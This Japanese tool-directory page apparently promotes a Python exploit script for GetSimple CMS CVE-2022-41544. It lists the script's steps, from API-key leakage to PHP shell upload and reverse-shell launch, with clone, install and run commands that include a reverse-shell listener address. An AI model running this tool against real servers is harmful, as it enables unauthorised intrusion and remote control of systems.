Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-41544 — Python製のエクスプロイトスクリプトで、GetSimple CMSのCVE-2022-41544に対応。APIキーの漏洩、CSRFトークンの抽出、PHPシェルのアップロード、リバースシェルの起動を自動化し、ペネトレーションテストを支援します。 | Kitploit
ツール/GitHubGitHub/h3x0v3rl0rd/cve-2022-41544
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト
GitHubh3x0v3rl0rd/cve-2022-41544

CVE-2022-41544

Python製のエクスプロイトスクリプトで、GetSimple CMSのCVE-2022-41544に対応。APIキーの漏洩、CSRFトークンの抽出、PHPシェルのアップロード、リバースシェルの起動を自動化し、ペネトレーションテストを支援します。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-41544 エクスプロイトスクリプト

このリポジトリには、GetSimple CMS の CVE-2022-41544 脆弱性を悪用するスクリプトが含まれています。このスクリプトは、脆弱性の確認、API キーの漏洩、Cookie の設定、CSRF トークンの取得、シェルのアップロード、シェルの起動など、複数のステップを実行します。

変更点と改善点

  1. 非推奨警告への対応: スクリプトの機能に不要だった非推奨の telnetlib インポートを削除しました。
  2. エラーハンドリングの強化: HTTP リクエストと XML 解析に対する、より堅牢なエラーハンドリングを追加しました。
  3. ユーザーフィードバックの改善: 各ステップの詳細なフィードバックを提供し、ユーザーがスクリプトの進捗状況や発生した問題を理解できるようにしました。
  4. 入力検証: ターゲット、パス、認証情報のユーザー入力が検証されるようにしました。
  5. ドキュメントとコメント: コードの可読性と使いやすさを向上させるために、コメントとドキュメントを追加しました。

使い方

  1. リポジトリのクローン:

    root@kitploit:~
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    
  2. 依存関係のインストール: Python 3 と requests ライブラリがインストールされていることを確認してください。

    root@kitploit:~
    pip3 install requests
    
  3. スクリプトの実行:

    root@kitploit:~
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    
    • <target>: ターゲットのドメインまたは IP アドレス。
    • <path>: GetSimple CMS のインストール先のパス。
    • <ip:port>: リバースシェル用の IP とポート。
    • <username>: GetSimple CMS の管理者ユーザー名。

    例:

    root@kitploit:~
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    

image

image

スクリプト概要

関数

  • print_the_banner(): ASCII アートを使用して装飾されたバナーを表示します。
  • get_version(target, path): ターゲットの GetSimple CMS のバージョンが脆弱かどうかを確認します。
  • api_leak(target, path): 認証 XML ファイルから API キーの取得を試みます。
  • set_cookies(username, version, apikey): 取得した API キーに基づいて、後続のリクエストに必要な Cookie を設定します。
  • get_csrf_token(target, path, headers): シェルのアップロードに必要な CSRF トークンを抽出します。
  • upload_shell(target, path, headers, nonce, shell_content): PHP シェルをターゲットサーバーにアップロードします。
  • shell_trigger(target, path): アップロードしたシェルを実行して、リバースシェル接続を確立します。

メイン関数

main() 関数は、CVE-2022-41544 の脆弱性を悪用するために上記の関数を順番に呼び出し、プロセス全体を統括します。

作成者

このスクリプトは h3x0v3rl0rd によって開発されました。

免責事項

このスクリプトは教育目的のみで提供されています。システムへの不正アクセスは違法かつ非倫理的です。このスクリプトは責任を持って、テストする明示的な許可を得たシステム上でのみ使用してください。

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

ツールをダウンロード